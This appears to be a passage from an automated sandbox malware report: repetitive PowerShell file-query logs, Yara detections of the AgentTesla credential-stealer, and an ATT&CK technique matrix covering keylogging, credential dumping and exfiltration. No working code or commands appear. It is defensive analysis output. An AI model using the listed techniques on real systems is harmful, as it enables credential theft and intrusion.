          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00114~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00112~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00112~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00116~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00114~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00112~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00112~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0013~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00116~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exeQueries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exeQueries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected AgentTeslaShow sources
          Source: Yara matchFile source: 0000001F.00000002.595068396.0000000003491000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 6068, type: MEMORYSTR
          Source: Yara matchFile source: 0000001F.00000002.595068396.0000000003491000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 6068, type: MEMORYSTR

          Remote Access Functionality:

          barindex
          Yara detected AgentTeslaShow sources
          Source: Yara matchFile source: 0000001F.00000002.595068396.0000000003491000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 6068, type: MEMORYSTR

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Spearphishing Link1Windows Management Instrumentation211DLL Side-Loading1DLL Side-Loading1Disable or Modify Tools11OS Credential DumpingFile and Directory Discovery2Remote ServicesData from Local SystemExfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScripting22Scheduled Task/Job1Extra Window Memory Injection1Scripting22LSASS MemorySystem Information Discovery114Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsNative API1Registry Run Keys / Startup Folder21Access Token Manipulation1Obfuscated Files or Information1Security Account ManagerSecurity Software Discovery121SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Standard Port11Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsExploitation for Client Execution13Logon Script (Mac)Process Injection212Software Packing1NTDSProcess Discovery2Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol3SIM Card SwapCarrier Billing Fraud
          Cloud AccountsScheduled Task/Job1Network Logon ScriptScheduled Task/Job1DLL Side-Loading1LSA SecretsVirtualization/Sandbox Evasion141SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol14Manipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaPowerShell1Rc.commonRegistry Run Keys / Startup Folder21Extra Window Memory Injection1Cached Domain CredentialsApplication Window Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsMasquerading1DCSyncRemote System Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
